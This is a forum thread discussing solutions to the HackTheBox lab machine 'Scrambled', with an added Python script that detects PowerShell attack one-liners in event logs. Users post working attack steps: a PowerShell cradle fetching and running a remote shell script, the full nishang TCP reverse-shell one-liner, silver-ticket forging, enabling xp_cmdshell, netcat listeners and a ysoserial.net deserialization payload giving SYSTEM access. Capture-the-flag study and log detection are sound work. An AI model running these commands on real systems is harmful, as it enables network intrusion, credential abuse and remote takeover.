Scrambled - HTB [Discussion]
(June 13, 2022, 04:42 PM)Toto Wrote:
(June 13, 2022, 04:33 PM)buggy Wrote:
(June 13, 2022, 04:30 PM)hacker1111 Wrote:
(June 13, 2022, 04:26 PM)buggy Wrote:
(June 13, 2022, 04:11 PM)hacker1111 Wrote:
$pass = ConvertTo-SecureString "ScrambledEggs9900" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("scrm\miscsvc", $pass)
Invoke-Command -Computer dc1 -ScriptBlock { IEX(New-Object Net.WebClient).downloadString("http://10.10.x.x/shell.ps1") } -Credential $cred


what's the shell.ps1?



cat /usr/share/nishang/Shells/Invoke-PowerShellTcpOneLine.ps1

#A simple and small reverse shell. Options and help removed to save space.
#Uncomment and change the hardcoded IP address and port number in the below line. Remove all help comments as well.
#$client = New-Object System.Net.Sockets.TCPClient("192.168.254.1",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

#$sm=(New-Object Net.Sockets.TCPClient("192.168.254.1",55555)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}


uncomment first payload and add your IP


I have to manually run the ps1?


Nah the command runs it for you.

I saw a lot of people talking about the stuff on port 4411, is that the root part? I finally managed to get my hand on the user flag and was wondering if the privesc was from within the shell or if I had to go back to 4411.


The ScrambleSever on port 4411 is the way to go
Get the .dll from the smb IT share and run strings against it to find command for the ScrambleSever on port 4411
Root part involves serialization/deserialization within the application


(June 13, 2022, 05:03 PM)infosecsy19 Wrote: anyone help please

how can I get the domain SID



I second this question on how @jon01 was able to get the domain SID for the impacket-ticketer.
Reply
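The one-liners quoted in this post (a WebClient download cradle fed to IEX, and the nishang TCPClient read/exec loop) are exactly what PowerShell Script Block Logging records as event 4104 in the Microsoft-Windows-PowerShell/Operational log on the host where they run. The following triage script is an added example, not code from this thread or from HTB: it runs a handful of indicator regexes over constructed 4104 ScriptBlockText values and assigns a severity. The host names, the documentation address 192.0.2.10, and the password literal are all made up.

```python
import re
from typing import Iterable

# Regexes over the ScriptBlockText of Microsoft-Windows-PowerShell/Operational
# event 4104 (Script Block Logging). They target the building blocks of the
# one-liners quoted in this thread: a WebClient download cradle fed to IEX,
# the TCPClient read/exec loop of the nishang shell, Invoke-Command with an
# explicit -Credential, and a SecureString built from a plaintext literal.
# PowerShell is case-insensitive, so the patterns are too; DOTALL lets them
# span the line breaks of a multi-line block.
INDICATORS = {
    "download_cradle": re.compile(r"net\.webclient.*downloadstring", re.I | re.S),
    "in_memory_exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "tcp_reverse_shell": re.compile(r"net\.sockets\.tcpclient.*\.getstream\(\)", re.I | re.S),
    "remote_invoke_with_cred": re.compile(r"invoke-command\b.*-credential\b", re.I | re.S),
    "plaintext_secure_string": re.compile(r"convertto-securestring\b.*-asplaintext", re.I | re.S),
}


def classify_script_block(script: str) -> list[str]:
    """Names of the indicators that fire on one script block, in INDICATORS order."""
    return [name for name, rx in INDICATORS.items() if rx.search(script)]


def severity(indicators: Iterable[str]) -> str:
    """Collapse indicator names into a triage level.

    A download cradle that is executed in memory, or a TCPClient loop that
    feeds socket data to IEX, is the shape of the shells discussed above and
    rates "high"; any single indicator on its own still deserves a look.
    """
    hits = set(indicators)
    if {"download_cradle", "in_memory_exec"} <= hits or "tcp_reverse_shell" in hits:
        return "high"
    if hits:
        return "medium"
    return "none"


def scan(events: Iterable[dict]) -> list[dict]:
    """One finding per event whose script block matched at least one indicator."""
    findings = []
    for ev in events:
        hits = classify_script_block(ev["script"])
        level = severity(hits)
        if level != "none":
            findings.append({"host": ev["host"], "user": ev["user"],
                             "severity": level, "indicators": hits})
    return findings


# Constructed sample events, not real logs. 192.0.2.10 is a documentation
# address and the password literal is a placeholder. Note where each block
# is logged: Invoke-Command ships the inner block to the target, so the
# cradle itself shows up in dc1's 4104 events, while the operator's own
# host logs the credential setup and the Invoke-Command call.
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "SCRM\\miscsvc", "script":
        "$pass = ConvertTo-SecureString \"Passw0rd-placeholder\" -AsPlainText -Force\n"
        "$cred = New-Object System.Management.Automation.PSCredential(\"scrm\\miscsvc\", $pass)\n"
        "Invoke-Command -Computer dc1 -ScriptBlock { IEX(New-Object Net.WebClient)"
        ".downloadString(\"http://192.0.2.10/shell.ps1\") } -Credential $cred"},
    {"host": "dc1", "user": "SCRM\\miscsvc", "script":
        "IEX(New-Object Net.WebClient).downloadString(\"http://192.0.2.10/shell.ps1\")"},
    {"host": "dc1", "user": "SCRM\\miscsvc", "script":
        "$client = New-Object System.Net.Sockets.TCPClient(\"192.0.2.10\",4444);"
        "$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};"
        "$sendback = (iex $data 2>&1 | Out-String)"},
    {"host": "ws01", "user": "SCRM\\helpdesk", "script":
        r"Get-ChildItem -Path C:\Windows\Temp | Where-Object { $_.Length -gt 1MB }"},
    {"host": "ws01", "user": "SCRM\\helpdesk", "script":
        "$p = ConvertTo-SecureString 'Passw0rd-placeholder' -AsPlainText -Force\n"
        "Get-Service -Name Spooler"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f['severity']:6} {f['host']:5} {f['user']:14} {', '.join(f['indicators'])}")
```

Two caveats worth keeping in mind when using something like this for real: Invoke-Command executes the script block on the remote host, so the cradle is logged on dc1 and only the credential setup on the operator's machine, which means both sides need Script Block Logging turned on; and -EncodedCommand or string concatenation defeats plain regexes, so pair them with AMSI and with network-side alerts on the outbound fetch of shell.ps1 and the connection back to port 4444.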
(June 13, 2022, 05:38 PM)langetmama11 Wrote:
(June 13, 2022, 04:42 PM)Toto Wrote:
The ScrambleSever on port 4411 is the way to go
Get the .dll from the smb IT share and run strings against it to find command for the ScrambleSever on port 4411
Root part involves serialization/deserialization within the application


I remember trying to use smbclient but it returned a "non supported error", was this something you encountered as well?
Reply
In short for the user:
Create a ticket to login to mysql, then enable xp_cmdshell

ticketer.py -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -nthash b999a16500b87d17ec7f2e2a68778f05 -user-id 500 Administrator -spn MSSQLSVC/dc1.scrm.local
export KRB5CCNAME=Administrator.ccache
mssqlclient.py dc1.scrm.local -k
enable_xp_cmdshell

Create a payload at https://www.revshells.com/ with powershell #3 (base64)
Listen with netcat (I used rlwrap for more convenience)

sudo rlwrap netcat -lvnp 443

In mysql with xp_cmdshell send the payload, you will receive the shell in netcat

xp_cmdshell

Use MiscSvc credentials

$SecPassword = ConvertTo-SecureString 'ScrambledEggs9900' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('Scrm\MiscSvc', $SecPassword)

Listen again with netcat

sudo rlwrap netcat -lvnp 443

send reverse shell using payload created above in https://www.revshells.com/

Invoke-Command -Computer dc1 -ScriptBlock { } -Credential $Cred

In netcat listener you will receive shell now as MiscSvc
Reply
But what about root? I can't seem to find anything with the dll and exe.
Reply
(June 13, 2022, 06:33 PM)GatoGamer1155 Wrote:

How did you manage to pull off the domain sid?
Reply
(June 13, 2022, 07:56 PM)langetmama11 Wrote: How did you manage to pull off the domain sid?

I'm stuck on the domain SID too, should I request a ST? Or with a TGT of sqlsvc am I ok?
Reply
Need a nudge for root: how to log in to the .exe?
Reply
(June 13, 2022, 06:02 PM)Toto Wrote:
(June 13, 2022, 05:38 PM)langetmama11 Wrote: I remember trying to use smbclient but it returned a "non supported error", was this something you encountered as well?

I did yes. I had to do a workaround to get access to the share via impacket-smbclient

impacket-getTGT scrm.local/miscsvc:ScrambledEggs9900 -dc-ip 10.129.xx.xx -no-pass -k
export KRB5CCNAME=//miscsvc.ccache
impacket-smbclient scrm.local/[email protected] -k -no-pass
Reply
Can anyone who managed to get administrator the intended way explain how?

Nvm, I figured it out.

Create a payload using ysoserial.net like:

ysoserial.exe -f BinaryFormatter -g WindowsIdentity -o base64 -c "<command>"


Connect to port 4411.

Send it like:

UPLOAD_ORDER;<payload>


And you have RCE as NT AUTHORITY\SYSTEM.

Reply
Can someone help with how to locate the domain SID? I've tried every tool I could think of. lookupsid, rpcclient, ldap. None of them work. Am I doing something wrong?
Reply

